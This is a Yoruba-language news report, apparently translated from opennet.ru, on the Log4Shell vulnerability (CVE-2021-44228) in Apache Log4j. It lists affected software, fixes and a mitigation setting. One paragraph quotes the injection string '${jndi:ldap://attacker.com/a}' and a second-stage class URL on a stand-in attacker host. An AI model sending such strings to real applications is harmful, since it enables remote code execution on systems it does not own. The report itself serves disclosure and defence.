Ni Apache Log4j, ilana olokiki fun siseto gedu ni awọn ohun elo Java, ailagbara pataki kan ti jẹ idanimọ ti o fun laaye koodu lainidii lati ṣiṣẹ nigbati iye ti a ṣe ni pataki ni ọna kika “{jndi:URL}” ti kọ si akọọlẹ naa. Ikọlu naa le ṣee ṣe lori awọn ohun elo Java ti o wọle awọn iye ti o gba lati awọn orisun ita, fun apẹẹrẹ, nigbati o ṣafihan awọn iye iṣoro ninu awọn ifiranṣẹ aṣiṣe.
O ṣe akiyesi pe o fẹrẹ jẹ gbogbo awọn iṣẹ akanṣe nipa lilo awọn ilana bii Apache Struts, Apache Solr, Apache Druid tabi Apache Flink ni ipa nipasẹ iṣoro naa, pẹlu Steam, Apple iCloud, awọn alabara Minecraft ati awọn olupin. O nireti pe ailagbara le ja si igbi ti awọn ikọlu nla lori awọn ohun elo ile-iṣẹ, tun ṣe itan-akọọlẹ ti awọn ailagbara pataki ninu ilana Apache Struts, eyiti, ni ibamu si iṣiro inira, ti lo ninu awọn ohun elo wẹẹbu nipasẹ 65% ti Fortune. Awọn ile-iṣẹ 100. Pẹlu awọn igbiyanju lati ṣayẹwo nẹtiwọki fun awọn ọna ṣiṣe ipalara.
Iṣoro naa buru si nipasẹ otitọ pe a ti tẹjade iṣamulo ti n ṣiṣẹ tẹlẹ, ṣugbọn awọn atunṣe fun awọn ẹka iduroṣinṣin ko ti ṣajọpọ. Idanimọ CVE ko tii ti sọtọ. Atunṣe naa wa ninu ẹka idanwo log4j-2.15.0-rc1. Gẹgẹbi iṣẹ-ṣiṣe fun didi ailagbara naa, o gba ọ niyanju lati ṣeto paramita log4j2.formatMsgNoLookups si otitọ.
Ìṣòro náà wáyé nítorí àtìlẹ́yìn log4j fún ṣíṣe àgbékalẹ̀ àwọn ìbòjú pàtàkì "{}" nínú àwọn ìlà log, èyí tí a lè lò láti ṣe àwọn ìbéèrè JNDI (Java Naming and Directory Interface). Ìkọlù náà bẹ̀rẹ̀ sí í yípadà sí fífi okùn kan pẹ̀lú ìyípadà "${jndi:ldap://attacker.com/a}", èyí tí, nígbà tí a bá ṣe àgbékalẹ̀ rẹ̀, log4j yóò fi ránṣẹ́. olupin ìbéèrè LDAP attacker.com fún ipa ọ̀nà kilasi Java. A dá a padà olupin Ipa ọna olukọlu naa (fun apẹẹrẹ http://second-stage.attacker.com/Exploit.class) ni a o gbe kalẹ ti a o si ṣe ni ipo ilana lọwọlọwọ, eyi ti yoo fun olukọlu naa laaye lati ṣe koodu alaiṣẹ lori eto naa pẹlu awọn anfani ti ohun elo lọwọlọwọ.
Afikun 1: Ailagbara naa ti ni idamọ CVE-2021-44228.
Addendum 2: Ọna kan lati fori aabo ti a ṣafikun nipasẹ itusilẹ log4j-2.15.0-rc1 ti jẹ idanimọ. Imudojuiwọn tuntun, log4j-2.15.0-rc2, ti dabaa pẹlu aabo pipe diẹ sii lodi si ailagbara naa. Koodu naa ṣe afihan iyipada ti o ni nkan ṣe pẹlu isansa ti ifopinsi aiṣedeede ninu ọran ti lilo URL JNDI ti ko tọ.
orisun: opennet.ru
